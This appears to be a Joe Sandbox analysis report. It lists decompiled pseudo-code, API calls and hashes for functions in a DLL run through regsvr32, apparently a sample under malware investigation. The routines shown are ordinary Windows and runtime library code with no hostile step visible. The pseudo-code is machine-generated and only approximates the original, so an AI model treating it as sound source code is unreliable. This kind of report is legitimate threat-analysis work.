                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                            • String ID:
                                                                                                            • API String ID: 3354205298-0
                                                                                                            • Opcode ID: 2557517eccbb9696ab163556630543b7d1cc2db7da66443bf135cd333d30a12f
                                                                                                            • Instruction ID: 49a1a39e4a335cb1035e2ca36527126fc36f233e68e158b4c8e2f4d27b7ad01c
                                                                                                            • Opcode Fuzzy Hash: 2557517eccbb9696ab163556630543b7d1cc2db7da66443bf135cd333d30a12f
                                                                                                            • Instruction Fuzzy Hash: 5E11EC7690011AEFDF02DF94CC89FDE7BB9FF08349F0080A1FA05AA011D7719A559B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10011A48 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 92%
                                                                                                            			E10011A48(void* __ecx, void* __eflags) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t11;
				int _t13;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t34;
				void* _t35;

				_push(__ecx);
				_t23 = __ecx;
				if(E10004D4A(__eflags, 0x10) == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E10011A2B(_t9);
				}
				_t11 = GetCurrentProcess();
				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
				_t34 = _t32;
				if(_t13 == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E1001C4CE(_t23, _t30, _t34, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}















                                                                                                            0x10011a4b
                                                                                                            0x10011a50
                                                                                                            0x10011a5a
                                                                                                            0x10011a67
                                                                                                            0x10011a67
                                                                                                            0x10011a5c
                                                                                                            0x10011a63
                                                                                                            0x10011a63
                                                                                                            0x10011a7a
                                                                                                            0x10011a83
                                                                                                            0x10011a8b
                                                                                                            0x10011a8c
                                                                                                            0x10011a90
                                                                                                            0x10011a98
                                                                                                            0x10011a98
                                                                                                            0x10011aa5
                                                                                                            0x10011aa5
                                                                                                            0x10011aad
                                                                                                            0x10011ab3
                                                                                                            0x10011abb

                                                                                                            APIs
                                                                                                              • Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10011A7A
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 10011A80
                                                                                                            • DuplicateHandle.KERNEL32(00000000), ref: 10011A83
                                                                                                            • GetLastError.KERNEL32(?), ref: 10011A9E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3704204646-0
                                                                                                            • Opcode ID: 48c76622b07e1260fdb1534259b3491da0b71c0db79951e57b58b6256fd15158
                                                                                                            • Instruction ID: ab2ce72c394f12d9cf7e836f78522521826892dae628e20e317a2ba2e4d81c76
                                                                                                            • Opcode Fuzzy Hash: 48c76622b07e1260fdb1534259b3491da0b71c0db79951e57b58b6256fd15158
                                                                                                            • Instruction Fuzzy Hash: A9017C76700204AFEB15DBA5CC89F9A7FA8DF88750F158415F905CF252EA70EC40DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000670D Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E1000670D(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* _t16;
				int _t17;
				int _t18;
				struct HWND__* _t19;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t35;

				_t32 = __edi;
				_t35 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					__eflags =  *((intOrPtr*)(__ecx + 0x14));
					if(__eflags == 0) {
						L3:
						_t17 = E10004E6E(0, _t25, _t32, _t35, _t39);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t35 + 0x18)) = 1;
						return _t18;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						_push(__edi);
						_t33 =  *((intOrPtr*)(__ecx + 0x14));
						_t19 = GetFocus();
						__eflags = _t19 -  *(_t33 + 0x20);
						if(_t19 ==  *(_t33 + 0x20)) {
							SendMessageA( *(E1000A8F0(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E1000EFCE( *((intOrPtr*)(_t35 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}












                                                                                                            0x1000670d
                                                                                                            0x1000670f
                                                                                                            0x10006711
                                                                                                            0x10006718
                                                                                                            0x1000674d
                                                                                                            0x10006750
                                                                                                            0x10006727
                                                                                                            0x10006727
                                                                                                            0x1000672c
                                                                                                            0x10006732
                                                                                                            0x10006745
                                                                                                            0x10006790
                                                                                                            0x10006790
                                                                                                            0x00000000
                                                                                                            0x10006790
                                                                                                            0x10006752
                                                                                                            0x10006756
                                                                                                            0x10006758
                                                                                                            0x10006759
                                                                                                            0x1000675c
                                                                                                            0x10006762
                                                                                                            0x10006765
                                                                                                            0x1000677d
                                                                                                            0x1000677d
                                                                                                            0x10006783
                                                                                                            0x1000678b
                                                                                                            0x00000000
                                                                                                            0x1000678b
                                                                                                            0x1000671d
                                                                                                            0x1000671f
                                                                                                            0x10006722
                                                                                                            0x10006725
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10006725
                                                                                                            0x10006799

                                                                                                            APIs
                                                                                                            • EnableMenuItem.USER32 ref: 10006745
                                                                                                              • Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                            • GetFocus.USER32 ref: 1000675C
                                                                                                            • GetParent.USER32(?), ref: 1000676A
                                                                                                            • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 1000677D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3849708097-0
                                                                                                            • Opcode ID: da181488fd32ae85599c137ac0e4151e4cf157de9effc839c6b85ff350a25f58
                                                                                                            • Instruction ID: e2afc09dcdd242cfcc452f6720a74c3cb54d3460b69826f3dc14470d92f8e7be
                                                                                                            • Opcode Fuzzy Hash: da181488fd32ae85599c137ac0e4151e4cf157de9effc839c6b85ff350a25f58
                                                                                                            • Instruction Fuzzy Hash: 88118E71504611EFE721DF20CC8881AB7F6FF88399B21CA2DF15A46969CB30BC44CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000B21C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 77%
                                                                                                            			E1000B21C(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E1000A917(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E1000AF41(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E1000B21C(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}













                                                                                                            0x1000b21c
                                                                                                            0x1000b21c
                                                                                                            0x1000b224
                                                                                                            0x1000b22a
                                                                                                            0x1000b28d
                                                                                                            0x1000b28d
                                                                                                            0x1000b291
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000b22e
                                                                                                            0x1000b232
                                                                                                            0x1000b25c
                                                                                                            0x1000b234
                                                                                                            0x1000b235
                                                                                                            0x1000b23a
                                                                                                            0x1000b23c
                                                                                                            0x1000b23e
                                                                                                            0x1000b241
                                                                                                            0x1000b244
                                                                                                            0x1000b247
                                                                                                            0x1000b24a
                                                                                                            0x1000b24b
                                                                                                            0x1000b24b
                                                                                                            0x1000b23c
                                                                                                            0x1000b262
                                                                                                            0x1000b266
                                                                                                            0x1000b269
                                                                                                            0x1000b26b
                                                                                                            0x1000b26d
                                                                                                            0x1000b27f
                                                                                                            0x1000b27f
                                                                                                            0x1000b26d
                                                                                                            0x1000b287
                                                                                                            0x1000b287
                                                                                                            0x1000b296

                                                                                                            APIs
                                                                                                            • GetTopWindow.USER32(?), ref: 1000B22A
                                                                                                            • GetTopWindow.USER32(00000000), ref: 1000B269
                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 1000B287
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window
                                                                                                            • String ID:
                                                                                                            • API String ID: 2353593579-0
                                                                                                            • Opcode ID: e0b1c7dcaef5420272ec71e23bd9130895c4420cb30c111c889f194c57433dfc
                                                                                                            • Instruction ID: bb9f297338e09c47c4769c98d14c4203ded29529c07ae9fe16b63de4f6ec589b
                                                                                                            • Opcode Fuzzy Hash: e0b1c7dcaef5420272ec71e23bd9130895c4420cb30c111c889f194c57433dfc
                                                                                                            • Instruction Fuzzy Hash: 0301E93600191ABBEF13AF908C05E9F3B65EF493D0F018114FA1055065C736CA61EFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10010AF2 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 50%
                                                                                                            			E10010AF2(short* _a4) {
				char* _v0;
				int _v8;
				int _v16;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t6;
				char* _t7;
				void* _t12;
				char* _t13;
				void* _t15;
				void* _t16;
				short* _t20;

				_t20 = _a4;
				if(_t20 != 0) {
					__imp__#7(_t20, _t16, _t12);
					_v8 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t20, _t6, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_t13 = _t7;
					__eflags = _t13;
					if(__eflags == 0) {
						E10004E3A(_t13, _t15, WideCharToMultiByte, 0, __eflags);
					}
					WideCharToMultiByte(0, 0, _t20, _v16, _t13, _v8, 0, 0);
					return _t13;
				}
				return 0;
			}


















                                                                                                            0x10010af4
                                                                                                            0x10010afd
                                                                                                            0x10010b06
                                                                                                            0x10010b1a
                                                                                                            0x10010b1e
                                                                                                            0x10010b22
                                                                                                            0x10010b26
                                                                                                            0x10010b2c
                                                                                                            0x10010b2e
                                                                                                            0x10010b30
                                                                                                            0x10010b32
                                                                                                            0x10010b32
                                                                                                            0x10010b45
                                                                                                            0x00000000
                                                                                                            0x10010b4a
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • SysStringLen.OLEAUT32(?), ref: 10010B06
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1001D033,00000000,00000018,1001D379), ref: 10010B1E
                                                                                                            • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 10010B26
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1001D033,00000000,00000018,1001D379), ref: 10010B45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3384502665-0
                                                                                                            • Opcode ID: 2aaaeee83b87f37a7c2fa2b797ecf6177c1475c8e7f20f5b86dc05104e7f5898
                                                                                                            • Instruction ID: c024efa3420e83baabe874ecab196389fa921329a1610a927b319e642033d1fa
                                                                                                            • Opcode Fuzzy Hash: 2aaaeee83b87f37a7c2fa2b797ecf6177c1475c8e7f20f5b86dc05104e7f5898
                                                                                                            • Instruction Fuzzy Hash: BCF0127120A2747FD2225B668C8CC9BBF9CFF8A2E97124529F58996101D6759900C6F1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000ABDB Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E1000ABDB(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E1000ABDB(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E1000A8F0(_t13, _t14, _t18);
						}
						_t10 = E1000A917(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E1000ABDB(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}













                                                                                                            0x1000abdb
                                                                                                            0x1000abdb
                                                                                                            0x1000abe6
                                                                                                            0x1000abec
                                                                                                            0x1000abf2
                                                                                                            0x1000abf6
                                                                                                            0x1000ac26
                                                                                                            0x1000ac29
                                                                                                            0x1000ac46
                                                                                                            0x1000ac46
                                                                                                            0x1000ac48
                                                                                                            0x1000ac4a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000ac34
                                                                                                            0x1000ac39
                                                                                                            0x1000ac3b
                                                                                                            0x1000ac40
                                                                                                            0x00000000
                                                                                                            0x1000ac40
                                                                                                            0x00000000
                                                                                                            0x1000ac3b
                                                                                                            0x1000abf8
                                                                                                            0x1000abfd
                                                                                                            0x1000ac0f
                                                                                                            0x1000ac13
                                                                                                            0x1000ac14
                                                                                                            0x00000000
                                                                                                            0x1000ac16
                                                                                                            0x1000ac1d
                                                                                                            0x1000ac22
                                                                                                            0x1000ac24
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000abff
                                                                                                            0x1000ac06
                                                                                                            0x1000ac0d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000ac0d
                                                                                                            0x1000abfd
                                                                                                            0x1000ac4f
                                                                                                            0x1000ac4f

                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 1000ABE6
                                                                                                            • GetTopWindow.USER32(00000000), ref: 1000ABF9
                                                                                                              • Part of subcall function 1000ABDB: GetWindow.USER32(00000000,00000002), ref: 1000AC40
                                                                                                            • GetTopWindow.USER32(?), ref: 1000AC29
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item
                                                                                                            • String ID:
                                                                                                            • API String ID: 369458955-0
                                                                                                            • Opcode ID: ce071e9538a02d42f810a6b21320928da7b329cf863030978907d6d72f575913
                                                                                                            • Instruction ID: cd43aa0fe87982c1d24f281b623a533cfa4df9f459eb7cb89b98fbb4107c1cf3
                                                                                                            • Opcode Fuzzy Hash: ce071e9538a02d42f810a6b21320928da7b329cf863030978907d6d72f575913
                                                                                                            • Instruction Fuzzy Hash: F7016236501666ABFB239F518D00E8F3A99EF0B3E0F038220FD005612AE731D9D19AE5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002BCC5 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002BCC5(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E1002B5C2(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E1002B6AE(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E1002BBCD(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E1002BB14(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}







                                                                                                            0x1002bcc5
                                                                                                            0x1002bcc8
                                                                                                            0x1002bcce
                                                                                                            0x1002bd41
                                                                                                            0x00000000
                                                                                                            0x1002bcd5
                                                                                                            0x1002bcd5
                                                                                                            0x1002bcd8
                                                                                                            0x1002bcf3
                                                                                                            0x1002bcf6
                                                                                                            0x1002bd16
                                                                                                            0x1002bd28
                                                                                                            0x1002bcf8
                                                                                                            0x1002bcf8
                                                                                                            0x1002bcfb
                                                                                                            0x00000000
                                                                                                            0x1002bcfd
                                                                                                            0x1002bd0f
                                                                                                            0x1002bd0f
                                                                                                            0x1002bcfb
                                                                                                            0x1002bd46
                                                                                                            0x1002bd4a
                                                                                                            0x1002bcda
                                                                                                            0x1002bcf2
                                                                                                            0x1002bcf2
                                                                                                            0x1002bcd8

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                            • String ID:
                                                                                                            • API String ID: 3016257755-0
                                                                                                            • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                            • Instruction ID: 3b922080ff75e98142c472849b9f5e6d9f0d2bf6741c52107cc94376e2c1784d
                                                                                                            • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                            • Instruction Fuzzy Hash: C9014B3680058EBBCF129E84EC418EE3F62FF19390F948455FE1959031D736D9B1AB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10029AD3 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E10029AD3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x10041648);
				E10022714(__ebx, __edi, __esi);
				_t31 = E10025E70(__edx, __edi, _t35);
				_t15 =  *0x100461fc; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E10023FE8(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10046100; // 0x4451308
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x10045cd8;
								if(__eflags != 0) {
									_push(_t33);
									E1001F6F4(_t25, _t31, _t33, __eflags);
								}
							}
						}
